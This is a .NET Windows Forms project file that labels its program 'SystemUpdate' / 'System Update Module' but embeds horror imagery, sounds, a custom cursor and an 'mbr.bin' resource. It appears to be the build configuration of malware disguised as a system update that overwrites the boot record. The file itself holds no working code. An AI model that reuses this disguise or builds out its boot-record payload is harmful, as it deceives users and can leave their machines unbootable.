<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <TargetFramework>net48</TargetFramework>
    <UseWindowsForms>true</UseWindowsForms>
    <PlatformTarget>AnyCPU</PlatformTarget>
    <ApplicationIcon>..\Resources\eye.ico</ApplicationIcon>
    <AssemblyTitle>SystemUpdate</AssemblyTitle>
    <AssemblyDescription>System Update Module</AssemblyDescription>
  </PropertyGroup>
  <ItemGroup>
    <EmbeddedResource Include="..\Resources\wallpaper.jpg" LogicalName="wallpaper.jpg" />
    <EmbeddedResource Include="..\Resources\eye.ico" LogicalName="eye.ico" />
    <EmbeddedResource Include="..\Resources\eye.ani" LogicalName="eye.ani" />
    <EmbeddedResource Include="..\Resources\horror.png" LogicalName="horror.png" />
    <EmbeddedResource Include="..\Resources\mbr.bin" LogicalName="mbr.bin" />
    <EmbeddedResource Include="..\Resources\hr.wav" LogicalName="hr.wav" />
  </ItemGroup>
  <ItemGroup>
    <Reference Include="System.Windows.Forms" />
    <Reference Include="System.Drawing" />
  </ItemGroup>
</Project>
